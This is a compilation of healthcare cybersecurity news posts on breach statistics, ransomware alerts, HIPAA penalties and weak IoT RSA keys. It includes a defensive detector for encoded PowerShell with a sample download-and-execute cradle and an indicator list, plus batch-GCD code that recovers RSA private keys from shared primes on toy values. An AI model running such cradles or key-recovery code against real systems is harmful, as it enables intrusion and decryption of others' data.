Healthcare Cybersecurity

Healthcare Data Breaches Predicted to Cost Industry $4 Billion in 2020

Healthcare industry data breaches are occurring more frequently than ever before. The healthcare data breach figures for 2019 have yet to be finalized, but so far 494 data breaches of more than 500 records have been reported to the HHS’ Office for Civil Rights and more than 41.11 million records were exposed, stolen, or impermissibly disclosed in 2019. That makes 2019 the worst ever year for healthcare data breaches and the second worst in terms of the number of breached healthcare records.

The healthcare industry now accounts for around four out of every five data breaches and 2020 looks set to be another record-breaking year. The cost to the healthcare industry from those breaches is expected to reach $4 billion in 2020.

The poor state of healthcare cybersecurity was highlighted by a survey of healthcare security professionals conducted in late 2019 by Black Book Market Research. The survey was conducted on 2,876 security professionals from 733 provider organizations to identify cybersecurity gaps, vulnerabilities, and deficiencies in the healthcare industry.

The survey revealed more than 93% of healthcare organizations experienced a data breach between Q3, 2016. 57% of surveyed healthcare providers experienced more than 5 breaches in that period. Even though there is a high risk of a data breach being suffered, investment in cybersecurity is nowhere near the level it needs to be.

“It is becoming increasingly difficult for hospitals to find the dollars to invest in an area that does not produce revenue,” said Doug Brown, founder of Black Book. According to 90% of hospital representatives surveyed, IT security budgets have remained level since 2016.

The survey revealed hospital systems have increased their cybersecurity budgets to around 6% of their IT spend but spending on cybersecurity by physician organizations has decreased since 2018 and now stands at less than 1% of their IT budget.

When money is spent on cybersecurity, solutions are often purchased blindly or with little vision or discernment. The survey showed that between 2016 and 2018, 92% of data security purchase decisions were made by the C-suite without any users or affected department managers being involved in the purchasing decision.

Despite the threat of attack, 92% of healthcare organizations lack full-time cybersecurity professionals and only 21% of hospitals said they had a dedicated security executive. Only 6% of those respondents said that individual was the Chief Information Security Officer (CISO). Physician groups are much less likely to have a CISO. Only 1.5% of physician groups with more than 10 clinicians said they had a dedicated CISO.

More CISOs and cybersecurity professionals are sorely needed, but it is unclear where those individuals will come from due to a nationwide shortage of skilled cybersecurity professionals. In the meantime, cybersecurity is having to be outsourced to managed service providers as a stop-gap measure.

Other key findings of the survey include:

  • 96% of IT professionals said threat actors are outpacing medical enterprises
  • More money is being spent on marketing to repair damaged reputations after a breach than is spent on combating the consequences of data breaches.
  • 35% of healthcare organizations did not scan for vulnerabilities before an attack
  • 87% of healthcare organizations have not had a cybersecurity drill with an incident response process
  • 40% of providers surveyed do not carry out measurable assessments of their cybersecurity status.
  • 26% of hospital respondents and 93% of physician organizations currently report they do not have an adequate solution to instantly detect and respond to an organizational attack.

The post Healthcare Data Breaches Predicted to Cost Industry $4 Billion in 2020 appeared first on HIPAA Journal.

FBI Issues Alert as Maze Ransomware Attacks Increase in the U.S.

Last week, the Federal Bureau of Investigation (FBI) issued a flash alert warning private companies in the United States about the threat of attacks involving Maze ransomware. The warning came just a few days after the FBI issued an alert about two other ransomware variants, LockerGoga and MegaCortex.

The Maze ransomware TLP:Green warning is not intended for public distribution as it provides technical details about the attacks and indicators of compromise which can be used by private firms to prevent attacks. If published in the public domain, it could aid the attackers.

In the alert, victims of Maze ransomware attacks were urged to share information with the FBI as soon as possible to help its agents trace the attackers and bring them to justice.

Maze ransomware was first identified in early 2019, but it was not until November 2019 when the first attacks hit companies in the United States. Those attacks have been increasing in recent weeks.

When network access is gained, data is exfiltrated prior to file encryption. A ransom demand is then issued specific to the organization. The attackers claim they will supply the keys to decrypt files and will destroy all data they stole in the attack. The attackers warn their victims that if payment is not made before the deadline is reached, they will start publishing the stolen data.

Maze ransomware was used in a recent attack on the City of Pensacola. When the ransom was not paid the attackers started publishing the stolen data. In December, the Carrollton, GA-based wire and cabling firm, Southwire, was attacked with Maze ransomware. An 850 BTC ($6 million) ransom demand was issued for the keys to decrypt files. The attackers said they had stolen data and threatened to publish it if the ransom was not paid. When no payment was received, the attackers created a website with an Irish ISP and started publishing the data.

Southwire successfully obtained a court injunction in Ireland forcing the ISP to take down the website that was being used by the Maze gang to publish its data. That website is now offline. Southwire also filed a lawsuit against the hackers in federal court in Georgia. Southwire alleges violations of the U.S. Computer Fraud and Abuse Act and is seeking injunctive relief and damages. Since the attackers are unknown, the lawsuit was filed against ‘John Doe.’

According to CyberScoop, which obtained a copy of the FBI alert, the threat actors use a variety of methods to attack businesses, including malicious cryptocurrency websites, malspam and phishing campaigns impersonating government agencies and security vendors, and ransomware downloads via exploit kits such as Fallout.

The FBI has urged private companies in the United States to heed its warning and take steps to strengthen their defenses and address vulnerabilities. In the event of an attack, the FBI does not recommend paying the ransom as there is no guarantee that valid keys to decrypt data will be supplied or that the stolen data will be destroyed.


DHS Warns of Retaliatory Cyberattacks in Response to U.S. Drone Strike

The U.S. Department of Homeland Security has issued a warning about retaliatory cyberattacks following the military action in Iraq in which Iran’s top general, Major General Qasem Soleimani, was killed in a drone strike.

The U.S. Department of Defense issued a statement saying “General Soleimani was actively developing plans to attack American diplomats and service members in Iraq and throughout the region.” President Trump tweeted soon after the attack saying, “We took action last night to stop a war. We did not take action to start a war.”

Iran has condemned the attack and the country’s supreme leader, Ayatollah Ali Khamenei, has vowed to take “forceful revenge” on the United States. The U.S. State Department has advised all Americans in Iraq to leave the country over concerns for their safety and on Sunday, Iraqi MPs voted to expel all US troops from the country.

There are genuine fears of reprisal attacks from Iran and growing concern that those attacks will take place in cyberspace rather than on the ground. US companies, government agencies, and critical infrastructure could be targeted. Iran may have relatively limited military power, but highly destructive cyberattacks are well within Iran’s capabilities.

Threat actors with links to the Iranian government have long been conducting cyberattacks in the United States, but the nature of the attacks may well change. Iran has been developing a range of offensive cyber tools and has conducted destructive cyberattacks in the past. Notably, threat actors linked to Iran used the wiper malware Shamoon to attack the Saudi Arabian oil giant Aramco in 2012. Further wiper malware variants are understood to have also been developed which could be deployed against targets in the United States. Iran has also been linked to the SamSam ransomware attacks, including the attack on the City of Atlanta.

Acting secretary of the DHS, Chad Wolf, said no specific, credible threats against the United States have been identified so far. The DHS will continue to monitor the situation and will be working with local, state, and federal partners to ensure the safety of all Americans.

It is not known if or when any attacks will take place, but local, state, and federal leaders have been urged to take the necessary precautions. Director of the DHS’ Cybersecurity and Infrastructure Security Agency, Chris Krebs, said on Twitter, “Bottom line: time to brush up on Iranian [Tactics, Techniques and Procedures] and pay close attention to your critical systems, particularly ICS. Make sure you’re also watching third party accesses!”

Krebs also referenced an earlier warning that he issued in June, in which he said, “CISA is aware of a recent rise in malicious cyber activity directed at United States industries and government agencies by Iranian regime actors and proxies. We will continue to work with our intelligence community and cybersecurity partners to monitor Iranian cyber activity, share information, and take steps to keep America and our allies safe.”


HIPAA Enforcement in 2019

It has been another year of heavy enforcement of HIPAA compliance. HIPAA enforcement in 2019 by the Department of Health and Human Services’ Office for Civil Rights (OCR) has resulted in 10 financial penalties. $12,274,000 has been paid to OCR in 2019 to resolve HIPAA violation cases.

2019 saw one civil monetary penalty issued and settlements were reached with 9 entities, one fewer than 2018. In 2019, the average financial penalty was $1,022,833.

HIPAA Enforcement in 2019 by the HHS' Office for Civil Rights


Particularly egregious violations will attract financial penalties, but some of the HIPAA settlements in 2019 provide insights into OCR’s preferred method of dealing with noncompliance. Even when HIPAA violations are discovered, OCR prefers to settle cases through voluntary compliance and by providing technical assistance. When technical assistance is provided and covered entities fail to act on OCR’s advice, financial penalties are likely to be issued.

This was made clear in two of the most recent HIPAA enforcement actions. OCR launched compliance investigations into two covered entities after being notified about data breaches. OCR discovered in both cases that HIPAA Rules had been violated. OCR chose to provide technical assistance to both entities rather than issue financial penalties, but the covered entities failed to act on the guidance and a financial penalty was imposed.

Sentara Hospitals disagreed with the guidance provided by OCR and refused to update its breach report to reflect the actual number of patients affected. West Georgia Ambulance was issued with technical guidance and failed to take sufficient steps to address the areas of noncompliance identified by OCR.

If you are told by OCR that your interpretation of HIPAA is incorrect, or are otherwise issued with technical guidance, it pays to act on that guidance quickly. Refusing to take corrective action is a sure-fire way to guarantee a financial penalty, attract negative publicity, and still be required to change policies and procedures in line with the guidance.

There were two important HIPAA enforcement updates in 2019. OCR adopted a new interpretation of the Health Information Technology for Economic and Clinical Health (HITECH) Act’s requirements for HIPAA penalties and a new enforcement initiative was launched.

The HITECH Act of 2009 called for an increase in the penalties for HIPAA violations. On January 25, 2013, the HHS implemented an interim final rule and adopted a new penalty structure. At the time it was thought that there were inconsistencies in the language of the HITECH Act with respect to the penalty amounts. OCR determined that the most logical reading of the HITECH Act requirements was to apply the same maximum penalty of $1,500,000 per violation category, per calendar year to all four penalty tiers.

In April 2019, OCR issued a notice of enforcement discretion regarding the penalties. A review of the language of the HITECH Act led to a reduction in the maximum penalties in three of the four tiers. The maximum penalties for HIPAA violations were changed to $25,000, $100,000, and $250,000 for penalty tiers 1, 2, and 3 (subject to inflationary increases).

2019 saw the launch of a new HIPAA Right of Access enforcement initiative targeting organizations who were overcharging patients for copies of their medical records and were not providing copies of medical records in a timely manner in the format requested by the patient.

The extent of noncompliance was highlighted by a study conducted by Citizen Health, which found that 51% of healthcare organizations were not fully compliant with the HIPAA Right of Access. Delays providing copies of medical records, refusals to send patients’ PHI to their nominated representatives or their chosen health apps, not providing a copy of medical records in an electronic format, and overcharging for copies of health records are all common HIPAA Right of Access failures.

The two HIPAA Right of Access settlements reached so far under OCR’s enforcement initiative have both resulted in $85,000 fines. With these enforcement actions OCR is sending a clear message to healthcare providers that noncompliance with the HIPAA Right of Access will not be tolerated.

Right of Access violations aside, the same areas of noncompliance continue to attract financial penalties, especially the failure to conduct a comprehensive, organization-wide risk analysis. 2019 also saw an increase in the number of cited violations of the HIPAA Breach Notification Rule.

HIPAA Compliance Issues Cited in 2019 Enforcement Actions

Noncompliance Issue                        | Number of Cases
Risk Analysis                              | 5
Breach Notifications                       | 3
Access Controls                            | 2
Business Associate Agreements              | 2
HIPAA Right of Access                      | 2
Security Rule Policies and Procedures      | 2
Device and Media Controls                  | 1
Failure to Respond to a Security Incident  | 1
Information System Activity Monitoring     | 1
No Encryption                              | 1
Notices of Privacy Practices               | 1
Privacy Rule Policies and Procedures       | 1
Risk Management                            | 1
Security Awareness Training for Employees  | 1
Social Media Disclosures                   | 1

OCR’s HIPAA enforcement in 2019 also clearly demonstrated that a data breach does not have to have occurred for a compliance investigation to be launched. OCR investigates all breaches of 500 or more records to determine whether noncompliance contributed to the cause of a breach, but complaints can also result in an investigation and compliance review. That was the case with both enforcement actions under the HIPAA Right of Access initiative.



FBI Issues Warning Following Spate of LockerGoga and MegaCortex Ransomware Attacks

The FBI has issued a TLP:Amber alert in response to a spate of cyberattacks involving the ransomware variants LockerGoga and MegaCortex. The threat actors using these ransomware variants have been targeting large enterprises and organizations and typically deploy the ransomware several months after a network has been compromised.

LockerGoga was first detected in January 2019 and MegaCortex ransomware first appeared in May 2019. Both ransomware variants exhibit similar IoCs and have similar C2 infrastructure and are both used in highly targeted attacks on large corporate networks.

LockerGoga was used in the ransomware attacks on the U.S. chemical companies Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consulting firm, Altran Technologies. MegaCortex ransomware was used in the attacks on the accounting software firm Wolters Kluwer and the cloud hosting firm iNSYNQ, to name but a few. The threat actors are careful, methodical, and attempt to cause maximum damage to increase the probability that their victims will pay. The ransom demands are often of the order of hundreds of thousands of dollars or more.

The initial compromise is achieved through a variety of methods including the exploitation of unpatched vulnerabilities, phishing attacks, SQL injection, brute force tactics on RDP, and the use of stolen credentials. Once compromised, the attackers run batch files to stop processes and services used by security solutions to ensure their presence is not detected. The attackers move laterally to compromise as many devices as possible using a penetration testing tool named Cobalt Strike, living-off-the-land Windows binaries, and legitimate software tools such as Mimikatz. A beacon is added to each compromised device on the network, which is used to execute PowerShell scripts, escalate privileges, and spawn a new session to act as a listener on the victim’s system, according to the FBI warning, as reported by Bleeping Computer which obtained a copy of the alert.

In contrast to many other threat actors who deploy ransomware soon after a system is compromised, the threat actors behind these attacks often wait several months before the ransomware encryption routine is triggered. It is unclear what the threat actors do during that time, but it is likely the time is used to steal sensitive data. The ransomware is deployed in the final stage of the attack once all useful data has been obtained from the victims.

The advice offered by the FBI to improve defenses is standard for preventing ransomware and other cyberattacks. Cybersecurity best practices should be followed, including backing up data regularly; storing backup copies on non-networked devices; testing backups to ensure file recovery is possible; setting strong passwords; patching promptly; enabling multi-factor authentication, especially on admin accounts; ensuring RDP servers can only be accessed via a VPN; disabling SMBv1; and scanning for open ports and blocking them so they cannot be accessed.

The FBI also recommends auditing the creation of new accounts and monitoring Active Directory for changes to authorized users; enabling PowerShell logging and monitoring for unusual commands, including the execution of Base64 encoded PowerShell; and ensuring only the latest version of PowerShell is installed.
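As an added example of the PowerShell monitoring the FBI recommends (this is not code from the FBI alert or the original post), the following Python audits process command lines for encoded PowerShell, decodes the Base64-of-UTF-16LE argument, and lists indicators found in either the visible command line or the decoded script. The command lines and scripts are constructed samples, and the indicator list is an assumption to be replaced with your own detection content.

```python
import base64
import re

# PowerShell's parameter binder accepts any prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match every prefix, longest first, followed by a Base64-looking
# argument. Intentionally broad: a missed encoded command costs more than a
# false positive, and the decode step below sorts the rest out.
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENCODED_FLAG = re.compile(rf"(?i)(?:^|\s)[-/](?:{_PREFIXES})\s+([A-Za-z0-9+/=]{{8,}})")

# Assumed starter list of constructs worth an analyst's attention, whether they
# appear in the visible command line or inside the decoded script.
INDICATORS = ["IEX", "Invoke-Expression", "Net.WebClient", "DownloadString",
              "FromBase64String", "-w hidden", "-nop"]


def decode_powershell_blob(blob: str):
    """-EncodedCommand carries Base64 of UTF-16LE text (not UTF-8); None if invalid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _present(indicator: str, text: str) -> bool:
    # Whole-token match so "-nop" does not fire on "-NoProfile".
    pattern = r"(?<![\w-])" + re.escape(indicator) + r"(?![\w-])"
    return re.search(pattern, text, re.I) is not None


def audit_command_line(cmdline: str) -> dict:
    """Flag encoded PowerShell, decode it, and list the indicators found."""
    finding = {"command_line": cmdline, "encoded": False, "decoded": None, "indicators": []}
    visible = cmdline
    m = ENCODED_FLAG.search(cmdline)
    if m:
        finding["encoded"] = True
        finding["decoded"] = decode_powershell_blob(m.group(1))
        visible = cmdline.replace(m.group(1), "<blob>")   # never pattern-match Base64 text
    text = visible + "\n" + (finding["decoded"] or "")
    finding["indicators"] = [ind for ind in INDICATORS if _present(ind, text)]
    return finding


def audit_command_lines(cmdlines):
    return [audit_command_line(c) for c in cmdlines]


def encode_for_powershell(script: str) -> str:
    """Used only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines, as a 4688 or Sysmon CommandLine field would show them.
BENIGN_SCRIPT = "Get-Service -Name Spooler | Select-Object Status"
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell(BENIGN_SCRIPT),
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(CRADLE_SCRIPT),
]

if __name__ == "__main__":
    for f in audit_command_lines(SAMPLE_COMMAND_LINES):
        print(f["encoded"], f["indicators"], (f["decoded"] or "")[:60])
```

Only the third sample earns a triage: it is encoded, launched hidden without a profile, and decodes to a download-and-execute one-liner, while the second shows that encoding alone is not evidence of malice.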


November 2019 Healthcare Data Breach Report

In November 2019, 33 healthcare data breaches of 500 or more records were reported to the Department of Health and Human Services’ Office for Civil Rights (OCR). That represents a 36.5% decrease in reported breaches from October, the worst ever month for healthcare data breaches since OCR started listing breaches on its website in October 2009. The fall in breaches is certainly good news, but data breaches are still occurring at a rate of more than one a day.

600,877 healthcare records were exposed, impermissibly disclosed, or stolen in November. That represents a 9.2% decrease in breached healthcare records from October, but the average breach size increased by 30.1% to 18,208 records in November.

Largest Healthcare Data Breaches in November 2019

Name of Covered Entity | Covered Entity Type | Individuals Affected | Type of Breach | Location of Breached PHI
Ivy Rehab Network, Inc. and its affiliated companies | Healthcare Provider | 125,000 | Hacking/IT Incident | Email
Solara Medical Supplies, LLC | Healthcare Provider | 114,007 | Hacking/IT Incident | Email
Saint Francis Medical Center | Healthcare Provider | 107,054 | Hacking/IT Incident | Electronic Medical Record, Network Server
Southeastern Minnesota Oral & Maxillofacial Surgery | Healthcare Provider | 80,000 | Hacking/IT Incident | Network Server
Elizabeth Family Health | Healthcare Provider | 28,375 | Theft | Paper/Films
The Brooklyn Hospital Center | Healthcare Provider | 26,312 | Hacking/IT Incident | Network Server
Utah Valley Eye Center | Healthcare Provider | 20,418 | Hacking/IT Incident | Desktop Computer
Loudoun Medical Group d/b/a Comprehensive Sleep Care Center (“CSCC”) | Healthcare Provider | 15,575 | Hacking/IT Incident | Email
Choice Cancer Care | Healthcare Provider | 14,673 | Hacking/IT Incident | Email
Arizona Dental Insurance Services, Inc. d.b.a. Delta Dental of Arizona | Health Plan | 12,886 | Hacking/IT Incident | Email

Causes of Healthcare Data Breaches in November 2019

Hacking/IT incidents dominated November’s breach reports and accounted for 63.6% of data breaches reported in November and 90.75% of the breached records (545,293). The average breach size was 25,966 records and the median breach size was 3,977 records.

There were 7 unauthorized access/disclosure breaches reported in November involving 16,586 healthcare records. The mean breach size was 2,369 records and the median breach size was 996 records.

There were 4 incidents involving the theft of 38,998 individuals’ protected health information. Two of the incidents involved electronic devices and two involved paper records. The mean breach size was 7,799 records and the median breach size was 3,237 records.

Phishing continues to be the most common cause of healthcare data breaches. 17 of the healthcare data breaches reported in November involved PHI stored in email accounts. The majority of those breaches were due to phishing attacks.

November 2019 Healthcare Data Breaches by Covered Entity Type

There were 28 healthcare provider data breaches reported in November and four breaches were reported by health plans. It was a good month for business associates, with only one breach reported, although a further two breaches had some business associate involvement.


November 2019 Healthcare Data Breaches by State

Data breaches were reported by covered entities in 19 states. California was the worst affected with 4 breaches, followed by Illinois, Missouri, New York, and Texas with three breaches each. Two breaches were reported by covered entities in Florida, North Carolina, and Pennsylvania, and there was one reported breach in each of Alaska, Arizona, Colorado, Connecticut, Indiana, Maryland, Michigan, Minnesota, Nebraska, Utah, and Virginia.

HIPAA Enforcement in November 2019

There were three financial penalties imposed on HIPAA-covered entities in November to resolve HIPAA violations.

University of Rochester Medical Center (URMC) settled its HIPAA violation case with OCR for $3,000,000. OCR launched an investigation after receiving two notifications about breaches due to lost or stolen devices. OCR investigated URMC in 2010 after the first device was lost and provided technical assistance. At the time, URMC recognized the high risk of storing ePHI on devices and the need for encryption, yet this was not implemented, and unencrypted portable electronic devices continued to be used. When OCR investigated the subsequent theft of a laptop computer, its investigators found URMC had failed to conduct an organization-wide risk analysis, risks had not been reduced to a reasonable and appropriate level, and URMC had not implemented appropriate device media controls.

Sentara Hospitals agreed to settle its HIPAA violation case with OCR for $2,175,000. OCR launched a compliance investigation in response to a complaint from a patient in April 2017. The patient had received a bill from Sentara containing another patient’s protected health information. Sentara Hospitals reported the breach as affecting 8 individuals, but OCR found that 577 letters had been misdirected to 16,342 different guarantors. Sentara Hospitals refused to update its breach report with the new total. OCR also found Sentara Hospitals had failed to enter into a business associate agreement with one of its vendors.

A substantial financial penalty was also imposed on The Texas Department of Aging and Disability Services (DADS). DADS had reported a breach of 6,617 patients’ ePHI to OCR in 2015. An error in a web application allowed ePHI to be accessed over the internet by individuals unauthorized to view the data. ePHI had been exposed for around 8 years. OCR investigated and found that DADS had failed to conduct an organization-wide risk analysis, there was a lack of access controls, and DADS failed to monitor information system activity. DADS settled the HIPAA violation case and paid a penalty of $1.6 million.


Poor RSA Encryption Implementation Opens Door to Attacks on Medical Devices and Implants

Encryption renders data inaccessible to unauthorized individuals, provided the private key to decrypt data is not compromised and strong encryption is used.

Not all algorithms provide the same level of protection. The strength of encryption relies on the length of the key. The longer the key, the more computational power is required to break the encryption. When strong encryption is used, the computing power and time required to break the encryption renders the data virtually inaccessible.

DES was once considered a strong form of encryption but the computing power now available makes cracking the encryption possible even on relatively inexpensive computers. DES used 56-bit keys, which were fine in the 1970s, but today the keys are nowhere near long enough. Strong encryption today is generally considered to require 256-bit keys, such as those generated by the AES algorithm. With AES-256, for the time being at least, sensitive data can be adequately secured. Providing the key is not disclosed, encrypted data cannot be accessed.

RSA is an alternative encryption standard that is commonly used to protect sensitive data. It uses an asymmetric cryptographic algorithm with two keys, a private key and a public key. The public key can be given to anyone, as it cannot be used on its own to decrypt data. For that the private key is also required.

The keys are generated by multiplying two random prime numbers. RSA keys are long and cannot easily be guessed or brute forced due to the level of computing power required. However, if errors are made implementing RSA encryption, keys can easily be cracked.

One of the problems that can arise is when RSA keys are not generated using truly random prime numbers. Errors in randomness weaken the encryption. A recent analysis of RSA certificates by Keyfactor has shown that in many IoT devices, the factors used to generate the keys are not entirely random, which makes it much easier to deduce the private key.

In such cases, a considerable amount of computing power is still required, but not enough to make cracking the encryption sufficiently difficult. According to Keyfactor, all it would take is around $3,000 of compute time on a single Azure virtual machine to crack these weak keys. At such a low cost, threat actors may find it well worth the investment.

The researchers collected 175 million RSA certificates from the internet and ran a scalable GCD algorithm over them on their Azure VM. 75 million of those keys were actively used to encrypt traffic and 100 million were publicly available keys. Keyfactor’s analysis identified 435,000 RSA certificates that shared a prime factor with at least one other certificate. That equates to around 1 in 172 RSA certificates. Keyfactor was able to break all 435,000 certificates for less than $3,000 in Azure compute time.

Shared factors are mostly found in lightweight IoT devices. This is because they do not have sufficient entropy to generate truly random numbers as they lack the necessary processing power. The random numbers used are therefore predictable. Discover the two prime numbers used to generate the key and the private key can be derived.

“Lightweight IoT devices are particularly prone to being in low entropy states due to the lack of input data they might receive, as well as the challenge of incorporating hardware-based random number generation economically,” explained Keyfactor. “Keys generated by lightweight IoT devices are therefore at risk of not being sufficiently random, increasing the chance that two keys share a factor and allow the key to be broken.”

One example they found involved an 8,192-bit RSA key. That key was extremely large, so it should not have been possible to guess it no matter how much time was devoted to the task. Yet guess that key they did. The length of the key was fine, but since the factor used was not entirely random, the length of the key was irrelevant.

A threat actor with the derived private key cannot be distinguished from the genuine private key holder, which opens the door to man-in-the-middle attacks, data tampering, and data theft.
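To make the shared-factor problem concrete, here is an added example (not Keyfactor’s code and not from the original post) that audits a fleet of RSA public moduli with a batch GCD built from a product tree and a remainder tree, the approach behind a scalable GCD scan, and then shows why a hit is fatal by recovering the private exponent from the shared prime. The fleet, its primes and the public exponent are constructed toy values, far smaller than real keys.

```python
from math import gcd

# Constructed toy fleet: four "device" RSA keys built from small primes so the
# arithmetic is visible. Real keys use 2048-bit moduli; the algorithm is the same.
_A, _B, _C, _D, _E, _F, _G = 10007, 10009, 10037, 10039, 10061, 10067, 10069
PUBLIC_EXPONENT = 65537
TOY_FLEET = {
    "device-01": _A * _B,
    "device-02": _C * _D,   # shares the prime _C with device-04
    "device-03": _E * _F,
    "device-04": _C * _G,   # a low-entropy generator reused _C
}


def product_tree(values):
    """Levels of pairwise products, leaves first, root (product of all) last."""
    tree = [list(values)]
    while len(tree[-1]) > 1:
        level = tree[-1]
        tree.append([level[i] * (level[i + 1] if i + 1 < len(level) else 1)
                     for i in range(0, len(level), 2)])
    return tree


def batch_gcd(moduli):
    """For each N_i return gcd(N_i, product of all the other moduli).

    One product tree plus one remainder tree replaces n*(n-1)/2 pairwise gcds,
    which is what lets a scan cover millions of certificates.
    """
    tree = product_tree(moduli)
    remainders = [tree[-1][0]]            # root: product of every modulus
    for level in reversed(tree[:-1]):     # descend: r_child = r_parent mod child^2
        remainders = [remainders[i // 2] % (n * n) for i, n in enumerate(level)]
    # P mod N_i^2 == N_i * (Q mod N_i) where Q is the product of the others,
    # so dividing by N_i and taking a gcd yields gcd(N_i, Q).
    return [gcd(n, r // n) for n, r in zip(moduli, remainders)]


def find_shared_factors(fleet):
    """Audit a {name: modulus} fleet; return {name: shared factor} for weak keys."""
    names = list(fleet)
    gcds = batch_gcd([fleet[name] for name in names])
    findings = {}
    for name, g in zip(names, gcds):
        if g == fleet[name]:
            findings[name] = "duplicate modulus"   # identical key on another device
        elif g != 1:
            findings[name] = g
    return findings


def recover_private_exponent(modulus, e, shared_prime):
    """One known prime gives the other, hence phi(N), hence d."""
    p, q = shared_prime, modulus // shared_prime
    if p * q != modulus:
        raise ValueError("shared_prime does not divide modulus")
    return pow(e, -1, (p - 1) * (q - 1))


def key_is_fully_compromised(modulus, e, shared_prime, sample=42):
    """True when the recovered d decrypts what the public key encrypted."""
    d = recover_private_exponent(modulus, e, shared_prime)
    return pow(pow(sample, e, modulus), d, modulus) == sample


if __name__ == "__main__":
    for name, issue in find_shared_factors(TOY_FLEET).items():
        print(f"{name}: weak key, shared factor {issue}")
```

A key flagged by the audit should be treated as already disclosed and replaced, regardless of its length, which is exactly the 8,192-bit case described above.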

This has major implications for a wide range of industries that use large numbers of IoT devices, healthcare among them. In healthcare, many medical devices and implants have low entropy, so the encryption could be cracked and data obtained for a relatively small investment.

“The findings are alarming. The research finds inordinate rates of compromise impacting IoT devices with design constraints and limited entropy,” Keyfactor CTO Ted Shorter said. “These devices could include cars, medical implants and other critical devices, that if compromised, could result in life-impacting harm.”

Making existing IoT devices more secure is a major challenge. It may not be possible to patch affected IoT devices and if they lack sufficient processing power, they will remain insecure. The solution is to build sufficient entropy into the devices to ensure truly random factors are used to generate strong RSA keys.


15 Million Customers Potentially Impacted by Ransomware Attack on Large Canadian Medical Testing Company

A major data breach has been reported by one of Canada’s largest medical testing and diagnostics companies. Toronto-based LifeLabs said hackers have potentially gained access to the personal and health information of up to 15 million customers, most of whom are in British Columbia and Ontario. The number of people potentially affected makes this one of the largest healthcare ransomware attacks to date. The privacy commissioners in both provinces said the scale of the attack was “extremely troubling.”

After gaining access to its systems, the attackers deployed ransomware and encrypted an extensive amount of customer data. The cyberattack is still under investigation, so it is unclear what, if any, data has been stolen. It has been confirmed that the attackers gained access to parts of the system that contained the test results of around 85,000 Ontarians. The test results were from 2016 and earlier. No evidence has been found to suggest more recent test results, or medical test results from customers in other areas, have been compromised.

Some of those test results include highly sensitive health information that could potentially be used for blackmail. Other sensitive data potentially accessed includes names, email addresses, health card numbers, dates of birth, usernames, and passwords. To date, it appears that the compromised information has not been misused and the data does not appear to have been disclosed online. Based on the initial findings of the investigation, the risk to customers is believed to be low.

It is unclear whether LifeLabs had viable backups to restore the data, but the decision was taken to pay the ransom. The amount of the ransom has not been publicly disclosed. “We wanted to get the data back,” said LifeLabs chief executive Charles Brown. “We thought it was the smart thing to do because it was just in the best interests of our customers.”

Cybersecurity and computer forensics experts were engaged by LifeLabs to secure its systems and determine the full scope of the attack. It may take some time to discover whether any customer data has been stolen by the attackers.

The attack is believed to have started on or before November 1, 2019, but the cyberattack was only disclosed to the public on December 17, 2019. Affected individuals are now being notified and have been offered one year of complimentary credit monitoring and identity theft protection services.


Blue Cross Blue Shield of Minnesota Starts Correcting 200,000 Critical and Severe Vulnerabilities

Blue Cross Blue Shield of Minnesota, the largest health insurer in the state, is now taking steps to fix around 200,000 unaddressed vulnerabilities on its servers that, in some cases, are more than a decade old.

In August 2018, Tom Yardic, a cybersecurity engineer at BCBS Minnesota discovered patches were not being applied on its servers, even though the vulnerabilities were rated critical or severe. The engineer met with executives at BCBS Minnesota to raise the alarm, yet no action appeared to be taken.

Around a month later, Yardic alerted the BCBS Minnesota board of trustees as a last resort to get action taken to address the flaws, according to a recent report in the Star Tribune.

According to the newspaper report, evidence was obtained that revealed vulnerabilities had not been addressed for many years. There were around 200,000 critical or severe vulnerabilities that had not been addressed on approximately 2,000 servers. Around 44% of the vulnerabilities were more than 3 years old and approximately 12% of the flaws dated back 10 or more years.

Approximately 3.9 million individuals are insured by BCBS Minnesota. The failure to correct the vulnerabilities in a reasonable time frame has placed their sensitive information at risk.

The Star Tribune spoke with officials at BCBS Minnesota who confirmed that work is now underway to correct the flaws and said it is trying to correct as many of the flaws as possible before the end of the year. According to the Star Tribune, “Minnesota Blue Cross did not dispute the accuracy of the number of past vulnerabilities” and said that the number of unaddressed vulnerabilities is now far lower and is much lower on workstations.

It is not surprising that a cybersecurity engineer has taken steps to get the flaws corrected. It is surprising that it took so long, especially following the cyberattacks on Anthem Inc., Premera Blue Cross, and Excellus BCBS in 2015 that resulted in the theft of the protected health information of more than 99.8 million Americans.

Surprisingly, given the sheer number of unaddressed vulnerabilities, BCBS Minnesota has never reported a data breach of its own systems since the HHS Office for Civil Rights started publishing summaries of data breaches on its breach portal in 2009.
